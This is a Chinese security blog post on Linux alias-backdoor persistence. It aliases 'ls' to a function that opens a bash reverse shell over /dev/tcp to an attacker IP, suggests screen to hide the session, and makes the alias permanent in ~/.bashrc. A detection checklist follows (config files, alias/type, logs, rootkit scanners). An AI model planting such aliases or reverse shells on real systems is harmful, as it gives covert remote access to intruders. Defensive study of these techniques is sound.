Linux持久化—Alias后门

admin
admin
admin
102360
文章
87
评论
2023年12月22日11:07:48评论34 views字数 1900阅读6分20秒阅读模式

实现原理

Linux alias 后门是一种通过修改 shell 的 alias 别名功能来实现的安全漏洞,允许攻击者执行恶意命令而不被轻易察觉。原理是在用户的 shell 配置文件(如 ~/.bashrc~/.bash_profile~/.zshrc等)中添加别名(alias),使得正常看似无害的命令在实际执行时会触发恶意操作。

使用配置文件设置别名:

vim ~/.bashrc

Linux持久化—Alias后门

Linux持久化—Alias后门

使用命令设置别名:

Linux持久化—Alias后门

注意:

系统启动默认加载的配置文件,比如:/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout

/etc/profile

【系统级】 Linux是一个多用户操作系统。用户登录或切换(即Login shell 启动)时都有一个专用的运行环境,但首先执行 /etc/profile

/etc/bashrc

【系统级】 在 bash shell 打开时运行,修改该文件配置的环境变量将会影响所有用户使用的bash shell

~/.bashrc

【用户级】 当用户登录时以及每次打开新的shell时该文件都将被读取,不推荐在这里配置用户专用的环境变量,因为每开一个shell,该文件都会被读取一次,效率肯定受影响

~/.bash_profile && ~./bash_login

【用户级】

如果有其中的一个文件存在的话, 当启动的是一个登录shell时,Bash 会执行该文件而不会执行~/.profile

如果两个文件都存在的话,Bash 将会优先执行~/.bash_profile 而不是~/.bash_login

~/.bash_logout

【用户级】 当每次退出系统(退出bash shell)时执行该文件

操作步骤

临时alias

1、被攻击端

使用别名创建一个反弹shell

#将ls设置为反弹shell
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/172.23.119.142/4444 0>&1; };alerts'

Linux持久化—Alias后门

2、攻击端

Linux持久化—Alias后门

这里执行ls后会成功执行命令,但是存在一个很大的问题就是ls命令会卡死,无法操作,只有攻击者将会话结束,才能够恢复。所以我们可以使用screen创建一个隐藏窗口

永久alias

通过命令行创建的alias如果系统重启后则会失效,因此我们需要在配置文件上创建alias别名。

alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/172.23.119.142/6666 0>&1; };alerts'

Linux持久化—Alias后门

配置后source一下即可生效

Linux持久化—Alias后门

如何排查

  1. 查看 Shell 配置文件: 检查用户的 Shell 配置文件,尤其是 ~/.bashrc~/.bash_profile~/.zshrc 等,查找是否存在不明显的 alias 定义。
cat ~/.bashrc
cat ~/.bash_profile
cat ~/.zshrc
  1. 查看系统范围的 Shell 配置文件: 有时,系统范围的 Shell 配置文件(如 /etc/bash.bashrc/etc/profile 等)也可能被修改,因此检查这些文件也很重要。
cat /etc/bash.bashrc
cat /etc/profile
  1. 检查用户别名: 使用 alias 命令查看当前 shell 的别名定义,确保别名没有被修改或添加。
alias

Linux持久化—Alias后门

  1. 检查命令的实际路径: 使用 typewhich 命令查看给定命令的实际路径,确保没有被替换成恶意脚本或程序。
alias command_name
type command_name
which command_name

Linux持久化—Alias后门

  1. 审查系统日志: 查看系统日志文件,特别关注与 shell 执行相关的记录。常见的系统日志文件包括 /var/log/syslog/var/log/auth.log/var/log/secure 等。
cat /var/log/syslog
cat /var/log/auth.log
  1. 使用安全扫描工具: 使用专业的安全扫描工具,如 chkrootkitrkhunter 等,以检查系统是否受到已知后门或恶意软件的感染。
sudo chkrootkit
sudo rkhunter --check
  1. 检查系统进程: 使用 ps 命令查看当前运行的进程,确保没有异常或未知的进程。
ps aux
  1. 定期审查系统文件: 定期检查系统关键文件的完整性,确保它们没有被篡改。使用 debsums(Debian/Ubuntu)或 rpm -V(Red Hat/CentOS)等工具。
sudo debsums -c
sudo rpm -Va

原文始发于微信公众号(贝雷帽SEC):Linux持久化—Alias后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月22日11:07:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux持久化—Alias后门https://cn-sec.com/archives/2327461.html

发表评论

匿名网友 填写信息